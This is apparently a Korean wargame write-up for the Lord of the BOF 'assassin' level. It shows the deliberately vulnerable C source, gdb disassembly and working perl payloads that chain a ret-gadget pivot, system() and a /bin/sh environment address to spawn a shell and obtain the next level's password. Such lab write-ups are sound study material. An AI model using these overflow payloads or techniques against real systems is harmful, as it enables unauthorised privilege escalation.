
오오.. 이번엔 뻥뚫리게 속시원하게 풀렸네여..

strace못쓰겟슴다.. 우선 사용방법부터 공부해야겠어여 써봤는데 해독을 못하게씀.. 무엇이 무엇인고

[giant@localhost giant]$ ls

assassas  assassin  assassin.c  core

[giant@localhost giant]$ cat assassin.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - assassin

        - no stack, no RTL

*/


#include <stdio.h>

#include <stdlib.h>


/*
 * main - Lord of the BOF "assassin" target. Deliberately vulnerable: the
 * unbounded strcpy below copies argv[1] into a 40-byte stack buffer, so an
 * argument of 48+ bytes overwrites buffer, the saved frame pointer and the
 * saved return address. In the disassembly later on this page buffer sits
 * at ebp-0x28 (40 bytes), so the return address starts at argv[1] offset 44.
 *
 * The two filters only look at argv[1][47] -- the most significant byte of
 * that overwritten return address -- and reject 0xbf (stack addresses, e.g.
 * the 0xbffffc88 env pointer found later) and 0x40 (libc addresses, e.g.
 * system at 0x40058ae0). An address inside the binary's own text segment
 * (0x08xxxxxx) passes; the write-up uses main's own `ret` (0x0804851e) as a
 * one-slot stack pivot and then a normal return-to-libc chain.
 *
 * Returns: no explicit value (pre-C99 implicit-int main); the error paths
 * exit(0).
 *
 * NOTE(review): strcpy and memset are used without <string.h>, so they are
 * implicitly declared. The overflow is the exercise and must stay as is.
 */
main(int argc, char *argv[])

{

        char buffer[40];   /* data buffer; bytes 40..43 of an overflow hit the saved ebp, 44..47 the saved eip */


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        /* Reads one byte at a fixed offset; if argv[1] is shorter than 48
         * bytes this indexes past its terminator (out-of-bounds read). */
        if(argv[1][47] == '\xbf')

        {

                printf("stack retbayed you!\n");

                exit(0);

        }


        /* 0x40 is the high byte of the shared-library mapping on this box. */
        if(argv[1][47] == '\x40')

        {

                printf("library retbayed you, too!!\n");

                exit(0);

        }                                                                    


        /* Unbounded copy: the stack buffer overflow happens here. */
        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);


        // buffer+sfp hunter
        /* Zeroes buffer and the saved ebp (44 bytes) after the copy, so a
         * payload cannot leave data there; the saved return address at
         * offset 44 is untouched, which is why the `ret` still diverts. */
        memset(buffer, 0, 44);

}

/*소스를 보게되면 retbayed you라 하는데 이게 힌트같아보입니다. 잘 분석해보면 ret만 남습니다. ret는 변조할 수 있는것이죠! 근데 library에 들어있는 함수도 못쓰고 스택에 있는것도 못씁니다.. (막막)*/


[giant@localhost giant]$gdb -q

(gdb) p 0xbfffffff-0xbeffffff

$1 = 16777216

(gdb) zz

Undefined command: "zz".  Try "help". 

(gdb) q

[giant@localhost giant]$ ./assassas `perl -e 'print "A"x16777216'` 

bash: ./assassas: Argument list too long // 꼼수시도해보려다가 망함ㅋ될리가 없죠..

[giant@localhost giant]$ [a]x44, [ret func]4bytes, [ret]<-system, [dummy], [/bin/sh]

bash: -system,: No such file or directory

[giant@localhost giant]$ bash2

[giant@localhost giant]$ gdb -q assassas

(gdb) b main

Breakpoint 1 at 0x8048476

(gdb) r

Starting program: /home/giant/assassas


Breakpoint 1, 0x8048476 in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) q

The program is running.  Exit anyway? (y or n) y

[giant@localhost giant]$ export BINSH=/bin/sh

[giant@localhost giant]$ vi whereis.c

[giant@localhost giant]$ gcc whereis.c -o getenv

whereis.c: In function `main':

whereis.c:5: warning: assignment makes pointer from integer without a cast

[giant@localhost giant]$ ./getenv BINSH

env is at: 0xbffffc88


[giant@localhost giant]$ ./assassas `perl -e 'print "A"x44, "\xff\xff\xff\xff", "\xe0\x8a\x05\x40", "B"x4, "\x88\xfc\xff\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA    @BBBBˆü ¿

Segmentation fault (core dumped)

[giant@localhost giant]$ gdb -q assassas core

Core was generated by `./assassas AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA    @BBBBˆü ¿'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xffffffff in ?? ()

(gdb) disas main

Dump of assembler code for function main:

0x8048470 <main>:       push   %ebp

0x8048471 <main+1>:     mov    %esp,%ebp

0x8048473 <main+3>:     sub    $0x28,%esp

0x8048476 <main+6>:     cmpl   $0x1,0x8(%ebp)

0x804847a <main+10>:    jg     0x8048493 <main+35>

0x804847c <main+12>:    push   $0x8048570

0x8048481 <main+17>:    call   0x8048378 <printf>

0x8048486 <main+22>:    add    $0x4,%esp

0x8048489 <main+25>:    push   $0x0

0x804848b <main+27>:    call   0x8048388 <exit>

0x8048490 <main+32>:    add    $0x4,%esp

0x8048493 <main+35>:    mov    0xc(%ebp),%eax

0x8048496 <main+38>:    add    $0x4,%eax

0x8048499 <main+41>:    mov    (%eax),%edx

0x804849b <main+43>:    add    $0x2f,%edx

0x804849e <main+46>:    cmpb   $0xbf,(%edx)

0x80484a1 <main+49>:    jne    0x80484c0 <main+80>

0x80484a3 <main+51>:    push   $0x804857c

0x80484a8 <main+56>:    call   0x8048378 <printf>

0x80484ad <main+61>:    add    $0x4,%esp

0x80484b0 <main+64>:    push   $0x0

0x80484b2 <main+66>:    call   0x8048388 <exit>

0x80484b7 <main+71>:    add    $0x4,%esp

0x80484ba <main+74>:    lea    0x0(%esi),%esi

0x80484c0 <main+80>:    mov    0xc(%ebp),%eax

0x80484c3 <main+83>:    add    $0x4,%eax

0x80484c6 <main+86>:    mov    (%eax),%edx

0x80484c8 <main+88>:    add    $0x2f,%edx

---Type <return> to continue, or q <return> to quit---

0x80484cb <main+91>:    cmpb   $0x40,(%edx)

0x80484ce <main+94>:    jne    0x80484e7 <main+119>

0x80484d0 <main+96>:    push   $0x8048591

0x80484d5 <main+101>:   call   0x8048378 <printf>

0x80484da <main+106>:   add    $0x4,%esp

0x80484dd <main+109>:   push   $0x0

0x80484df <main+111>:   call   0x8048388 <exit>

0x80484e4 <main+116>:   add    $0x4,%esp

0x80484e7 <main+119>:   mov    0xc(%ebp),%eax

0x80484ea <main+122>:   add    $0x4,%eax

0x80484ed <main+125>:   mov    (%eax),%edx

0x80484ef <main+127>:   push   %edx

0x80484f0 <main+128>:   lea    0xffffffd8(%ebp),%eax

0x80484f3 <main+131>:   push   %eax

0x80484f4 <main+132>:   call   0x80483a8 <strcpy>

0x80484f9 <main+137>:   add    $0x8,%esp

0x80484fc <main+140>:   lea    0xffffffd8(%ebp),%eax

0x80484ff <main+143>:   push   %eax

0x8048500 <main+144>:   push   $0x80485ae

0x8048505 <main+149>:   call   0x8048378 <printf>

0x804850a <main+154>:   add    $0x8,%esp

0x804850d <main+157>:   push   $0x2c

0x804850f <main+159>:   push   $0x0

0x8048511 <main+161>:   lea    0xffffffd8(%ebp),%eax

0x8048514 <main+164>:   push   %eax

0x8048515 <main+165>:   call   0x8048398 <memset>

0x804851a <main+170>:   add    $0xc,%esp

0x804851d <main+173>:   leave

0x804851e <main+174>:   ret

---Type <return> to continue, or q <return> to quit---q

(gdb) q

[giant@localhost giant]$ ./assassas `perl -e 'print "A"x44, "\x1e\x85\x04\x08", "\xe0\x8a\x05\x40", "B"x4, "\x88\xfc\xff\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@BBBBˆü ¿

sh: /sh: No such file or directory

Segmentation fault (core dumped)

[giant@localhost giant]$ ./assassas `perl -e 'print "A"x44, "\x1e\x85\x04\x08", "\xe0\x8a\x05\x40", "B"x4, "\x84\xfc\xff\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@BBBB„ü ¿

bash$ exit

exit

Segmentation fault (core dumped)

[giant@localhost giant]$ ./assassin `perl -e 'print "A"x44, "\x1e\x85\x04\x08", "\xe0\x8a\x05\x40", "B"x4, "\x84\xfc\xff\xbf"'`

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@BBBB„ü ¿

bash$ my-pass

euid = 515


지난번에 했던걸 응용(?)했다해야하나.. 전단계에 execve를 썼던건 실패해도 ret로 돌아가 다음 명령을 실행할 수 있어서 였는데 라이브러리 함수를 못쓰게 되니까 (당황->고민->멍때리는 시간을 거쳤..)생각해보니 팝콘형님이 비슷한 얘기를 해주신 적 있습니다. 핵심은 소스의 검사가 argv[1][47], 즉 덮어쓴 리턴 주소의 최상위 바이트 하나만 본다는 점입니다. 그래서 0xbf(스택)와 0x40(라이브러리)만 막히고, 바이너리 자체의 텍스트 영역 주소인 main의 ret 명령(0x0804851e)은 0x08로 시작해 검사를 통과합니다. ret에 ret주소를 넣게되면 (ret= pop eip) eip가 pop되기도 하지만, pop라는 뜻은 esp도 4바이트 늘어난다는 뜻이기 때문에 다음 명령을 가리키고 있게 됩니다. 그 자리에 system함수의 주소를 넣고 4바이트 더미를 또 넣은 후 /bin/sh의 주소를 넣게되면 전 단계의 rtl과 같이 동작하게 됩니다. 참고로 getenv로 얻은 0xbffffc88로는 "/sh"가 실행된 것은, 실행 파일 이름 길이(getenv와 assassas)가 달라 스택 위 환경변수 위치가 그만큼 밀린 것으로 보이며, 그래서 4바이트를 뺀 0xbffffc84로 맞추니 쉘이 떴습니다.

